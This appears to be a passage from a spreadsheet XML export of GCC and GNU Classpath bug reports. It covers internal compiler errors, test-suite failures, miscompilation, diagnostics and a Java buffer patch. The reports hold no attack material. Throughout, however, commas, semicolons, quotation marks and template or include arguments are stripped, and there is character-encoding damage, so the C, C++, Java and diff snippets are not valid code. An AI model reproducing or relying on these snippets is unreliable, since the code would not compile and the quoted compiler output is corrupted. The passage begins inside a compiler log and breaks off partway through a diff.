Configured with: /cygdrive/i/szsz/tmpp/gcc4/gcc-4.8.2-2/src/gcc-4.8.2/configure --srcdir=/cygdrive/i/szsz/tmpp/gcc4/gcc-4.8.2-2/src/gcc-4.8.2 --prefix=/usr --exec-prefix=/usr --bindir=/usr/bin --sbindir=/usr/sbin --libexecdir=/usr/libexec --datadir=/usr/share --localstatedir=/var --sysconfdir=/etc --libdir=/usr/lib --datarootdir=/usr/share --docdir=/usr/share/doc/gcc --htmldir=/usr/share/doc/gcc/html -C --build=i686-pc-cygwin --host=i686-pc-cygwin --target=i686-pc-cygwin --without-libiconv-prefix --without-libintl-prefix --enable-shared --enable-shared-libgcc --enable-static --enable-version-specific-runtime-libs --enable-bootstrap --disable-__cxa_atexit --with-dwarf2 --with-arch=i686 --with-tune=generic --disable-sjlj-exceptions --enable-languages=adacc++fortranjavaltoobjcobj-c++ --enable-graphite --enable-threads=posix --enable-libatomic --enable-libgomp --disable-libitm --enable-libquadmath --enable-libquadmath-support --enable-libssp --enable-libada --enable-libjava --enable-libgcj-sublibs --disable-java-awt --disable-symvers --with-ecj-jar=/usr/share/java/ecj.jar --with-gnu-ld --with-gnu-as --with-cloog-include=/usr/include/cloog-isl --without-libiconv-prefix --without-libintl-prefix --with-system-zlib --libexecdir=/usr/lib
Thread model: posix
gcc version 4.8.2 (GCC) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-std=c++11' '-shared-libgcc' '-mtune=generic' '-march=i686'
 /usr/lib/gcc/i686-pc-cygwin/4.8.2/cc1plus.exe -E -quiet -v -Dunix -idirafter /usr/lib/gcc/i686-pc-cygwin/4.8.2/../../../../include/w32api -idirafter ../../include/w32api test.cpp -mtune=generic -march=i686 -std=c++11 -fpch-preprocess -o test.ii
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /usr/lib/gcc/i686-pc-cygwin/4.8.2/../../../../i686-pc-cygwin/include
ignoring nonexistent directory ../../include/w32api
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc/i686-pc-cygwin/4.8.2/include/c++
 /usr/lib/gcc/i686-pc-cygwin/4.8.2/include/c++/i686-pc-cygwin
 /usr/lib/gcc/i686-pc-cygwin/4.8.2/include/c++/backward
 /usr/lib/gcc/i686-pc-cygwin/4.8.2/include
 /usr/lib/gcc/i686-pc-cygwin/4.8.2/include-fixed
 /usr/include
 /usr/lib/gcc/i686-pc-cygwin/4.8.2/../../../../include/w32api
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-std=c++11' '-shared-libgcc' '-mtune=generic' '-march=i686'
 /usr/lib/gcc/i686-pc-cygwin/4.8.2/cc1plus.exe -fpreprocessed test.ii -quiet -dumpbase test.cpp -mtune=generic -march=i686 -auxbase test -std=c++11 -version -o test.s
GNU C++ (GCC) version 4.8.2 (i686-pc-cygwin)
	compiled by GNU C version 4.8.2 GMP version 5.1.3 MPFR version 3.1.2 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C++ (GCC) version 4.8.2 (i686-pc-cygwin)
	compiled by GNU C version 4.8.2 GMP version 5.1.3 MPFR version 3.1.2 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 68b77e646651014e4504034a5c7768ce
test.cpp: In substitution of â€˜template using rebind = broken [with target_t = float]â€™:
test.cpp:18:33:   required from here
test.cpp:13:36: internal compiler error: in retrieve_specialization at cp/pt.c:1021
  using rebind = broken
                                    ^
test.cpp:13:36: internal compiler error: Aborted
g++: internal compiler error: Aborted (program cc1plus)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>i-photon</t>
  </si>
  <si>
    <t>GCC-23720</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/debug/dwarf2/dwarf-char[123].c scan-assembler 0x[68][ \t]# DW_AT_encoding</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gnu/gcc-4.0/objdir/gcc/xgcc -B/home/dave/gnu/gcc-4
.0/objdir/gcc/ /home/dave/gnu/gcc-4.0/gcc/gcc/testsuite/gcc.dg/debug/dwarf2/dwar
f-char3.c   -O2 -gdwarf-2 -dA -fno-show-column -S  -o dwarf-char3.s    (timeout
= 300)
PASS: gcc.dg/debug/dwarf2/dwarf-char3.c (test for excess errors)
FAIL: gcc.dg/debug/dwarf2/dwarf-char3.c scan-assembler 0x[68][ \t]# DW_AT_encodi
ng
Looks like a assembler comment character issue:
$ less dwarf-char3.s
...
        .byte   0x6      DW_AT_encoding
...
        .uleb128 0x3e    (DW_AT_encoding)</t>
  </si>
  <si>
    <t>GCC-3833</t>
  </si>
  <si>
    <t>Fails to compile inline functions in objects</t>
  </si>
  <si>
    <t>Inline functions in a class which are declared in a header and defined in a separate file fails to compile. resulting in undefined references when linking.
/tmp/cc2BWRjj.o: In function `main':
/tmp/cc2BWRjj.o(.text+0xe): undefined reference to `A::test()'
Release:
gcc 3.0
Environment:
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.0/specs
Configured with: ../gcc-3.0/configure --prefix=/usr/local --enable-languages=c++ --enable-threads=posix
Thread model: posix
gcc version 3.0
How-To-Repeat:
inline.h:
class A
{
 public:
  //  void dummy()
  inline bool test()
}
inline.cpp:
#include inline.h
//  void
//  A::dummy()
//  {
//    test()
//  }
inline
bool A::test()
{
}
main.cpp:
#include inline.h
int main()
{
    A temp
    temp.test()
    return 0
}
g++ main.cpp inline.cpp -o main</t>
  </si>
  <si>
    <t>tarjeik</t>
  </si>
  <si>
    <t>GCC-32274</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/vect/pr32224.c</t>
  </si>
  <si>
    <t>I got
Executing on host: /export/build/gnu/gcc/build-ia64-linux/gcc/xgcc -B/export/build/gnu/gcc/build-ia64-linux/gcc/ /net/gnu-13/export/gnu/src/gcc/gcc/gcc/testsuite/gcc.dg/vect/pr31343.c   -O2 -ftree-vectorize -fdump-tree-vect-details -fno-show-column -S  -o pr31343.s    (timeout = 300)
PASS: gcc.dg/vect/pr31343.c (test for excess errors)
UNSUPPORTED: gcc.dg/vect/pr31699.c
UNSUPPORTED: gcc.dg/vect/pr32216.c
Executing on host: /export/build/gnu/gcc/build-ia64-linux/gcc/xgcc -B/export/build/gnu/gcc/build-ia64-linux/gcc/ /net/gnu-13/export/gnu/src/gcc/gcc/gcc/testsuite/gcc.dg/vect/pr32224.c   -O2 -ftree-vectorize -fdump-tree-vect-details -fno-show-column -S  -o pr32224.s    (timeout = 300)
/net/gnu-13/export/gnu/src/gcc/gcc/gcc/testsuite/gcc.dg/vect/pr32224.c: In function 'gmpz_export':^M
/net/gnu-13/export/gnu/src/gcc/gcc/gcc/testsuite/gcc.dg/vect/pr32224.c:13: error: invalid 'asm': ia64_print_operand: unknown code^M
compiler exited with status 1</t>
  </si>
  <si>
    <t>CLASSPATH-25164</t>
  </si>
  <si>
    <t>JFormattedTextField isn't updating it's formatter properly</t>
  </si>
  <si>
    <t>JFormattedTextField needs to update its formatter after focus gained or focus lost events.  Also when a formatter is installed it needs to take the current value from the text field and apply its stringToValue and valueToString methods to make the output appropriate.  
The testcase attached shows our current state versus that of the JDK.  Run the testcase and alternately give focus to the text field and the button.  You'll see the debug output from the JDK shows that much more is happening there than on our implementation.  We're missing quite a bit of functionality.</t>
  </si>
  <si>
    <t>GCC-78985</t>
  </si>
  <si>
    <t>[7 Regression] profiledbootstrap failure by -Wuninitialized</t>
  </si>
  <si>
    <t>profiledbootstrap fails for me on s390x-linux for quite some time now
(also on aarch64-linux in a similar way but re-checking with current trunk
didn't finish/fail yet).  lab_over is obviously not uninitialized
(but eventually jump threading gets in the way - I did not analyze this yet
as I lack a way to extract a testcase at the moment).
../configure --prefix=/usr --infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib64 --libexecdir=/usr/lib64 --enable-languages=cc++objcfortranobj-c++go --enable-checking=release --with-gxx-include-dir=/usr/include/c++/7 --enable-ssp --disable-libssp --disable-libvtv --disable-libmpx --disable-libcc1 --enable-plugin --with-bugurl=http://bugs.opensuse.org/ '--with-pkgversion=SUSE Linux' --with-slibdir=/lib64 --with-system-zlib --enable-__cxa_atexit --enable-libstdcxx-allocator=new --disable-libstdcxx-pch --enable-version-specific-runtime-libs --enable-linker-build-id --enable-linux-futex --enable-gnu-indirect-function --program-suffix=-7 --disable-multilib --without-system-libunwind --with-tune=zEC12 --with-arch=z196 --with-long-double-128 --enable-decimal-float --build=s390x-suse-linux --host=s390x-suse-linux
...
[ 4042s] ../../gcc/config/s390/s390.c: In function 'tree_node* s390_gimplify_va_
arg(tree tree gimple** gimple**)':
[ 4042s] ../../gcc/config/s390/s390.c:12296:52: error: 'lab_over' may be used un
initialized in this function [-Werror=maybe-uninitialized]
[ 4042s]      gimple_seq_add_stmt (pre_p gimple_build_label (lab_over))
[ 4042s]                                  ~~~~~~~~~~~~~~~~~~~^~~~~~~~~~
...
[ 4044s] cc1plus: all warnings being treated as errors
[ 4044s] make[3]: *** [Makefile:2221: s390.o] Error 1
[ 4044s] make[3]: *** Waiting for unfinished jobs....
[ 4045s] rm fsf-funding.pod gcov.pod gfdl.pod cpp.pod gpl.pod gfortran.pod gcc.pod gccgo.pod gcov-tool.pod
[ 4045s] make[3]: Leaving directory '/home/abuild/rpmbuild/BUILD/gcc-7.0.0-r244052/obj-s390x-suse-linux/gcc'
[ 4045s] make[2]: *** [Makefile:4725: all-stagefeedback-gcc] Error 2
[ 4045s] make[2]: Leaving directory '/home/abuild/rpmbuild/BUILD/gcc-7.0.0-r244052/obj-s390x-suse-linux'</t>
  </si>
  <si>
    <t>GCC-19883</t>
  </si>
  <si>
    <t>[4.0 regression] Even more array bounds rejected as non-constant in template...</t>
  </si>
  <si>
    <t>The following valid code snippet is rejected by mainline:
====================================
template struct A
{
    static const T i = 1
    char a[int(i)]
}
====================================
The error message is:
  bug1.cc:4: error: array bound is not an integer constant
Mark this is similar to PR19826 which you already fixed but with an
additional cast.
For the same reason the following testcase fails too:
==================================
template struct A {}
template struct B
{
    static const T i = 2
    A a
}
==================================
bug2.cc:6: error: template argument 1 is invalid
Due to this problem the testcase in PR19297 still fails on mainline.</t>
  </si>
  <si>
    <t>GCC-16002</t>
  </si>
  <si>
    <t>[3.4 regression] Strange error message with new parser</t>
  </si>
  <si>
    <t>void foo(void)
{
        double Q *= 5.0
}
causes gcc 3.4 to print (same for mainline)
te.cpp: In function `void foo()':
te.cpp:3: error: expected primary-expression before double
te.cpp:3: error: expected `' before double
while 3.3.4 printed the clearly superior
te.cpp: In function `void foo()':
te.cpp:3: error: parse error before `*=' token
EDG is even better
te.cpp(3): error: expected a 
  	double Q *= 5.0
  	         ^</t>
  </si>
  <si>
    <t>GCC-70944</t>
  </si>
  <si>
    <t>[7 Regression] ICE in immed_wide_int_const at emit-rtl.c:606 with -O3</t>
  </si>
  <si>
    <t>As mentioned in https://gcc.gnu.org/bugzilla/show_bug.cgi?id=70396#c5
after Richi's fix for PR70396 I still see very similar issue.
$ cat tc.ii
void fn1() {
  unsigned *a = 0
  for (int i i ++i) {
    unsigned g(a[i] &gt; 24)
    a[i] = g
  }
}
$ /home/marxin/bin/gcc2/lib/gcc/x86_64-pc-linux-gnu/7.0.0/cc1plus -fpreprocessed tc.ii -march=haswell -mmmx -mno-3dnow -msse -msse2 -msse3 -mssse3 -mno-sse4a -mcx16 -msahf -mmovbe -maes -mno-sha -mpclmul -mpopcnt -mabm -mno-lwp -mfma -mno-fma4 -mno-xop -mbmi -mbmi2 -mno-tbm -mavx -mavx2 -msse4.2 -msse4.1 -mlzcnt -mno-rtm -mno-hle -mrdrnd -mf16c -mfsgsbase -mno-rdseed -mno-prfchw -mno-adx -mfxsr -mxsave -mxsaveopt -mno-avx512f -mno-avx512er -mno-avx512cd -mno-avx512pf -mno-prefetchwt1 -mno-clflushopt -mno-xsavec -mno-xsaves -mno-avx512dq -mno-avx512bw -mno-avx512vl -mno-avx512ifma -mno-avx512vbmi -mno-clwb -mno-pcommit -mno-mwaitx -mno-clzero -mno-pku --param l1-cache-size=32 --param l1-cache-line-size=64 --param l2-cache-size=8192 -mtune=haswell -quiet -dumpbase tc.ii -O3
tc.ii:7:1: internal compiler error: in immed_wide_int_const at emit-rtl.c:606
 }
 ^
0xa4cf35 immed_wide_int_const(generic_wide_int &gt; const&amp; machine_mode)
	../../gcc/emit-rtl.c:606
0x13929a9 change_zero_ext
	../../gcc/combine.c:11111
0x13937d8 recog_for_combine
	../../gcc/combine.c:11148
0x13a175d try_combine
	../../gcc/combine.c:3503
0x13a6fc1 combine_instructions
	../../gcc/combine.c:1288
0x13a6fc1 rest_of_handle_combine
	../../gcc/combine.c:14348
0x13a6fc1 execute
	../../gcc/combine.c:14391
Thanks</t>
  </si>
  <si>
    <t>GCC-17083</t>
  </si>
  <si>
    <t>documentation of implementation-defined behaviour is incomplete</t>
  </si>
  <si>
    <t>The documentation of the implementation-defined behaviour is incomplete. In some
cases there are only the sentences from the language standards but not a single
word about how it is implemented. There should at least be the word TODO
(better: FIXME) to indicate that there is a sentence missing.
example: chapter 4.1 item 2
C99 J.3#1: ``A conforming implementation is _required_ to document its choice
of behavior in _each_ of the areas listed in this subclause.''</t>
  </si>
  <si>
    <t>GCC-61586</t>
  </si>
  <si>
    <t>ICE on alpha in alpha_handle_trap_shadows at config/alpha/alpha.c:8724</t>
  </si>
  <si>
    <t>Created attachment 32985
Failing preprocessed source.
gcc ICE in alpha_handle_trap_shadows at config/alpha/alpha.c:8724 seen with the attached preprocessed source (being a source file from python-scipy) when compiling at -O2 with both -mieee and -mcpu=ev4 on gcc git master and the 4.9 branch.
/home/mjc/toolchain/gcc-build/./gcc/xgcc -B/home/mjc/toolchain/gcc-build/./gcc/ -g -O2 -mcpu=ev4 -mieee -c ccEXci8c.c 
scipy/ndimage/src/ni_fourier.c: In function â€˜NI_FourierFilterâ€™:
scipy/ndimage/src/ni_fourier.c:420:1: internal compiler error: in alpha_handle_trap_shadows at config/alpha/alpha.c:8726
0x120a0b303 alpha_handle_trap_shadows
	../../gcc.git/gcc/config/alpha/alpha.c:8726
0x120a0b303 alpha_reorg
	../../gcc.git/gcc/config/alpha/alpha.c:9396
0x12064347b execute
	../../gcc.git/gcc/reorg.c:3959
Please submit a full bug report
with preprocessed source if appropriate.
Reducing optimisation to -O1 or leaving out any of -mieee or -mcpu=ev4 results in a successful compilation.  While I have not checked the gcc git 4.8 branch I note that Debian supplied gcc-4.8 compiles the file fine whereas Debian supplied gcc-4.9 ICEs so likely to be a regression from the 4.8 branch.
I wonder if this ICE is related in any way to bug 56858.</t>
  </si>
  <si>
    <t>mcree</t>
  </si>
  <si>
    <t>GCC-44942</t>
  </si>
  <si>
    <t>Bug in argument passing of long double</t>
  </si>
  <si>
    <t>On X86-64 the following code demonstrates how passing a long double as a fixed  argument causes corruption of the following variable arguments.
#include 
#include 
#include 
void test(int a int b int c int d int e int f int g long double h ...) {
  int i
  va_list ap
  va_start(ap h)
  i = va_arg(ap int)
  printf(Got %d expected %d\n i 123456789)
  va_end(ap)
}
int main() {
  test(0 0 0 0 0 0 0 (long double)0.0 (int)123456789)
  return 0
}</t>
  </si>
  <si>
    <t>pdox</t>
  </si>
  <si>
    <t>GCC-1555</t>
  </si>
  <si>
    <t>Virtual memory Overflow</t>
  </si>
  <si>
    <t>Virtual memory exhaused error popped up when 
gcc -c  was used with the file size being 10MB.
Release:
unknown
Environment:
gcc of HP UX 1.1
How-To-Repeat:
gcc -c  with a file size of 10MB</t>
  </si>
  <si>
    <t>shivsundar.nadar</t>
  </si>
  <si>
    <t>GCC-52116</t>
  </si>
  <si>
    <t>pragma GCC diagnostic only acts on some lines</t>
  </si>
  <si>
    <t>Created attachment 26567
two and a half testcases
The attachment has two cases but I think it might be the same bug. The second case is much easier to understand.
Case 1. Wrapping a warning location in _Pragma(GCC diagnostic ignored \-Wshadow\) does not work (sometimes). This precludes error suppression during macro expansion. Oddly it suppresses as expected (mostly) if both are on the same line. (Although it behaves oddly if one is warning and one is ignored)
Case 2:
If an error has multiple locations such as -Wshadow it will still be reported at the original location if it is suppressed at the new location.
This leads to a confusing isolated message:
error: shadowed declaration is here [-Werror=shadow]
Tested: Debian GCC 4.6.2-11 GCC trunk r183363</t>
  </si>
  <si>
    <t>GCC-2772</t>
  </si>
  <si>
    <t>bind2nd(mem_fun1_ref) does not work</t>
  </si>
  <si>
    <t>The following code (the whole code is in the attatchment):
    list mylist
    for_each(mylist.begin() mylist.end()
             bind2nd(mem_fun1_ref(
where f = int f(int i)
produces this message:
/usr/local/include/g++-v3/bits/stl_function.h: In member function `typename
   _Operation::result_type std::binder2nd::operator()(typename
   _Operation::first_argument_type&amp;) const [with _Operation =
   std::mem_fun1_ref_t]':
/usr/local/include/g++-v3/bits/stl_algo.h:90:   instantiated from `_Function std::for_each(_InputIter _InputIter _Function) [with _InputIter = std::_List_iterator _Function = std::binder2nd &gt;]'
testaus.cpp:23:   instantiated from here
/usr/local/include/g++-v3/bits/stl_function.h:224: no match for call to `(const
   std::mem_fun1_ref_t) (const myclass&amp; const int&amp;)'
/usr/local/include/g++-v3/bits/stl_function.h:578: candidates are: _Ret
   std::mem_fun1_ref_t::operator()(_Tp&amp; _Arg) const [with
   _Ret = int _Tp = myclass _Arg = int]
(See also bug #470 it seems to relate to this.)
I have tried also an older gcc-snapshot and 2.95.2 (with its own library). They produce the same error.
Release:
gcc version 3.0 20010430 (prerelease)
Environment:
Debian gnu/linux potato
How-To-Repeat:
By trying to compile (g++ testaus.cpp).</t>
  </si>
  <si>
    <t>eekaikko</t>
  </si>
  <si>
    <t>GCC-2063</t>
  </si>
  <si>
    <t>Internal compiler error in `gen_reload_inhi' at ../cc_tools/insn-emit.c:5550</t>
  </si>
  <si>
    <t>kernel/moc_qabstractlayout.cpp: In function `static class QMetaObject * QLayout::staticMetaObject()':
kernel/moc_qabstractlayout.cpp:136: Internal compiler error in `gen_reload_inhi' at ../cc_tools/insn-emit.c:5550
Please submit a full bug report.
See  for instructions
Release:
gcc version 2.95.2 19991024 (release)
How-To-Repeat:
Try to compile again with just the following command line
c++ -pthread -c -pthread -O -frerun-cse-after-loop -fPIC -o kernel/moc_qabstractlayout.o moc_qabstractlayout.ii
--------------------
The compilation without optimization succeeds !!</t>
  </si>
  <si>
    <t>vahe</t>
  </si>
  <si>
    <t>GCC-780</t>
  </si>
  <si>
    <t>bad code generation on i386</t>
  </si>
  <si>
    <t>It seems to be just bad code generation I'm not a
i386 assembley guru.
Release:
gcc version 2.97 20001111 (experimental)
Environment:
GNU ld 2.10.1
GNU assembler 2.10.1
How-To-Repeat:
[lucier@curie ~]$ cat bug.c
#include 
#define N -0x80000000L
int main ()
{
  int x y z
  x = N
  y = (N &lt; 0) ? -1 : 0
  z = (x &lt; 0) ? -1 : 0
  printf (%d %d\n y z)
  return 0
}
[lucier@curie ~]$ gcc bug.c
[lucier@curie ~]$ ./a.out
0 -1
[lucier@curie ~]$ gcc -save-temps bug.c
[lucier@curie ~]$ cat bug.s
        .file   bug.i
        .version        01.01
gcc2_compiled.:
        .section        .rodata
.LC0:
        .string %d %d\n
        .text
        .align 16
.globl main
        .type   main@function
main:
        pushl   %ebp
        movl    %esp %ebp
        subl    $24 %esp
        movl    $-2147483648 -4(%ebp)
        movl    $0 -8(%ebp)
        cmpl    $0 -4(%ebp)
        jns     .L3
        movl    $-1 -16(%ebp)
        jmp     .L4
        .p2align 47
.L3:
        movl    $0 -16(%ebp)
.L4:
        movl    -16(%ebp) %eax
        movl    %eax -12(%ebp)
        subl    $4 %esp
        pushl   -12(%ebp)
        pushl   -8(%ebp)
        pushl   $.LC0
        call    printf
        addl    $16 %esp
        movl    $0 %eax
        movl    %ebp %esp
        popl    %ebp
        ret
.Lfe1:
        .size   main.Lfe1-main
        .ident  GCC: (GNU) 2.97 20001111 (experimental)</t>
  </si>
  <si>
    <t>GCC-58761</t>
  </si>
  <si>
    <t>ICE with a lambda capturing this in a NSDMI</t>
  </si>
  <si>
    <t>An unreduced (sorry) test snippet:
#include 
#include 
#include 
template 
struct two_sided_list : std::forward_list
{
  using std::forward_list::forward_list
  typename std::forward_list::iterator push_back(T&amp;&amp; t)
  {
    end_ = this-&gt;insert_after(end_ std::forward(t))
  }
  T&amp; back()
  {
    return *end_
  }
private:
  typename std::forward_list::iterator end_ = [this](){this-&gt;end()}() // #1
}
int main()
{
  two_sided_list tsl{123}
  std::cout &lt;&lt; back is  &lt;&lt; tsl.back() &lt;&lt; std::endl
  tsl.push_back(4)
  std::cout &lt;&lt; back is  &lt;&lt; tsl.back() &lt;&lt; std::endl
}
Goes kaboom:
twosided_fwdlist_bug.cpp: In instantiation of â€˜struct two_sided_list::â€™:
twosided_fwdlist_bug.cpp:18:73:   required from here
twosided_fwdlist_bug.cpp:18:51: internal compiler error: in tsubst_copy at cp/pt.c:12344
   typename std::forward_list::iterator end_ = [this](){this-&gt;end()}()
                                                   ^
0x5ab2e8 tsubst_copy
	../../gcc/cp/pt.c:12344
0x585cab tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
	../../gcc/cp/pt.c:14921
0x5873bb tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
	../../gcc/cp/pt.c:13987
0x585e15 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
	../../gcc/cp/pt.c:14693
0x5c8ada instantiate_class_template_1
	../../gcc/cp/pt.c:9181
0x5c8ada instantiate_class_template(tree_node*)
	../../gcc/cp/pt.c:9239
0x659f7b complete_type(tree_node*)
	../../gcc/cp/typeck.c:132
0x586c75 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
	../../gcc/cp/pt.c:15018
0x5876c7 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
	../../gcc/cp/pt.c:14415
0x68a0e6 perform_member_init
	../../gcc/cp/init.c:538
0x68a0e6 emit_mem_initializers(tree_node*)
	../../gcc/cp/init.c:1096
0x695172 do_build_copy_constructor
	../../gcc/cp/method.c:622
0x695172 synthesize_method(tree_node*)
	../../gcc/cp/method.c:794
0x605be9 mark_used(tree_node* int)
	../../gcc/cp/decl2.c:4778
0x534926 build_over_call
	../../gcc/cp/call.c:7116
0x53071e build_new_method_call_1
	../../gcc/cp/call.c:7813
0x53071e build_new_method_call(tree_node* tree_node* vec** tree_node* int tree_node** int)
	../../gcc/cp/call.c:7883
0x531692 build_special_member_call(tree_node* tree_node* vec** tree_node* int int)
	../../gcc/cp/call.c:7440
0x686417 expand_default_init
	../../gcc/cp/init.c:1668
0x686417 expand_aggr_init_1
	../../gcc/cp/init.c:1769
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
If #1 is 
  typename std::forward_list::iterator end_ = this-&gt;end()
then it doesn't barf. That doesn't work though but that's not the compiler's
fault. If #1 is 
  typename std::forward_list::iterator end_ = [](typename std::forward_list::iterator s typename std::forward_list::iterator e){auto r = s while (++s != e) r = s return r}(this-&gt;begin() this-&gt;end())
it compiles and runs correctly.
I'll try to create a bit more reduced test snippet soon.</t>
  </si>
  <si>
    <t>GCC-70040</t>
  </si>
  <si>
    <t>[5 Regression] ICE in gimplify.c with deferred-length strings</t>
  </si>
  <si>
    <t>Created attachment 37841
test case
Current trunk reports an ICE with the attached test case:
gfortran -v test.f08
Driving: gfortran -v test.f08 -l gfortran -l m -shared-libgcc
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/scratch/martin/utrunk/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /scratch/martin/gccgit/configure --disable-bootstrap --prefix=/scratch/martin/utrunk --enable-languages=c++fortran --enable-target=all --enable-checking=release
Thread model: posix
gcc version 6.0.0 20160302 (experimental) [trunk revision dd4bd26:0fb01c5:a2cc9e8e2c74db1cdaa9269cde65d0a24f38cabe] (GCC) 
COLLECT_GCC_OPTIONS='-v' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /scratch/martin/utrunk/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/f951 test.f08 -quiet -dumpbase test.f08 -mtune=generic -march=x86-64 -auxbase test -version -fintrinsic-modules-path /scratch/martin/utrunk/lib/gcc/x86_64-pc-linux-gnu/6.0.0/finclude -o /tmp/ccL8StDt.s
GNU Fortran (GCC) version 6.0.0 20160302 (experimental) [trunk revision dd4bd26:0fb01c5:a2cc9e8e2c74db1cdaa9269cde65d0a24f38cabe] (x86_64-pc-linux-gnu)
        compiled by GNU C version 5.2.0 GMP version 5.1.3 MPFR version 3.1.3 MPC version 1.0.3 isl version none
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU Fortran2008 (GCC) version 6.0.0 20160302 (experimental) [trunk revision dd4bd26:0fb01c5:a2cc9e8e2c74db1cdaa9269cde65d0a24f38cabe] (x86_64-pc-linux-gnu)
        compiled by GNU C version 5.2.0 GMP version 5.1.3 MPFR version 3.1.3 MPC version 1.0.3 isl version none
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
test.f08:34:0:
     sourceType(j)%s = sourceType(l-1)%s
internal compiler error: in gimplify_expr at gimplify.c:11098
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-15447</t>
  </si>
  <si>
    <t>Lack of exception raised in ByteBufferImpl &amp; co.</t>
  </si>
  <si>
    <t>After slicing a ByteBuffer getting or setting values does'nt reflect this action 
 and the exceptions promised by the interface of get/set are not raised. As i am
a bad english writer because it's not my native language you'll find following
a little test case.
--- cut here ------
import java.nio.ByteOrder
import java.nio.ByteBuffer
import java.nio.BufferUnderflowException
public class BufferTest {
  public static void dumpBytes(ByteBuffer b) {
    System.out.println( dumpBytes :  )
    for( int i=0 i&lt;b.limit() i++ ) {
      System.out.println( byte # + i +  =  +
                          Integer.toHexString( b.get(i) ) )
    }
  }
  public static void main(String args[]) {
    byte a[] = new byte[32]
    for( int i=0 i&lt;32 i++ ) a[i] = (byte)i
    ByteBuffer b = ByteBuffer.wrap(a 3 5).slice()
    System.out.println( wrap() )
    dumpBytes(b.wrap(a 3 5))
    System.out.println( b.position() = +b.position() )
    System.out.println( b.limit() = +b.limit() )
    dumpBytes(b.slice())
    try {
      while(true) {
        System.out.println( get(position()) =  +
                            b.get() )
      }
    }
    catch( BufferUnderflowException bue ) {
      System.out.println( Ok vide !!! )
    }
  }
}
--- cut here ------
I can't access to cvs where i work to get the latest release and my home
internet access is rather slow to a so big thing as gcc. But browsing the latest
snapshot via cvsweb i see that the access to values after slice has been
corrected but not the exception that may be raised.
Following you'll find a patch of nio package of gcc 3.4.0 that both correct the
access of the underlying buffer (now corrected) and the exception that must be
raised.
--- cut here ------
diff -Naur nio.orig/ByteBuffer.java nio/ByteBuffer.java
--- nio.orig/ByteBuffer.java	Fri May 14 11:24:02 2004
+++ nio/ByteBuffer.java	Fri May 14 11:44:59 2004
@@ -6511 +6512 @@
   /**
    * Allocates a new direct byte buffer.
    */ 
+
   public static ByteBuffer allocateDirect (int capacity)
   {
     return DirectByteBufferImpl.allocate (capacity)
   }
-
+  
   /**
    * Allocates a new ByteBuffer object with a given capacity.
    */
diff -Naur nio.orig/ByteBufferImpl.java nio/ByteBufferImpl.java
--- nio.orig/ByteBufferImpl.java	Fri May 14 11:24:02 2004
+++ nio/ByteBufferImpl.java	Fri May 14 11:42:37 2004
@@ -12610 +12616 @@
   /**
    * Relative get method. Reads the next byte from the buffer.
+   *
+   * @exception BufferUnderflowException If there are no remaining
+   * bytes in this buffer.
    */
   final public byte get ()
   {
-    byte result = backing_buffer [position ()]
+    if( remaining() &gt; 0 )    
+      throw new BufferUnderflowException()
+    
+    byte result = backing_buffer [array_offset+position ()]
     position (position () + 1)
     return result
   }
@@ -1386 +1448 @@
    * Relative put method. Writes value to the next position
    * in the buffer.
    * 
+   * @exception BufferOverflowException If there no remaining 
+   * bytes in this buffer.
    * @exception ReadOnlyBufferException If this buffer is read-only.
    */
   final public ByteBuffer put (byte value)
@@ -1457 +15310 @@
     if (readOnly)
       throw new ReadOnlyBufferException ()
-    backing_buffer [position ()] = value
+    if( remaining() &gt; 0 )    
+      throw new BufferOverflowException()
+    
+    backing_buffer [array_offset+position ()] = value
     position (position () + 1)
     return this
   }
@@ -1597 +17010 @@
    */
   final public byte get (int index)
   {
-    return backing_buffer [index]
+    if( index &lt; 0 || limit() &lt; index )
+      throw new IndexOutOfBoundsException()
+    
+    return backing_buffer [array_offset+index]
   }
   /**
@@ -1757 +18910 @@
     if (readOnly)
       throw new ReadOnlyBufferException ()
-    backing_buffer [index] = value
+    if( index &lt; 0 || limit() &lt; index )
+      throw new IndexOutOfBoundsException()
+    
+    backing_buffer [array_offset+index] = value
     return this
   }
diff -Naur nio.orig/CharBufferImpl.java nio/CharBufferImpl.java
--- nio.orig/CharBufferImpl.java	Fri May 14 11:24:02 2004
+++ nio/CharBufferImpl.java	Fri May 14 11:42:37 2004
@@ -11510 +11516 @@
   /**
    * Relative get method. Reads the next char from the buffer.
+   *
+   * @exception BufferUnderflowException If there are no remaining
+   * bytes in this buffer.
    */
   final public char get ()
   {
-    char result = backing_buffer [position ()]
+    if( remaining() &gt; 0 )    
+      throw new BufferUnderflowException()
+    
+    char result = backing_buffer [array_offset+position ()]
     position (position () + 1)
     return result
   }
@@ -1276 +1338 @@
    * Relative put method. Writes value to the next position
    * in the buffer.
    * 
+   * @exception BufferOverflowException If there no remaining 
+   * bytes in this buffer.
    * @exception ReadOnlyBufferException If this buffer is read-only.
    */
   final public CharBuffer put (char value)
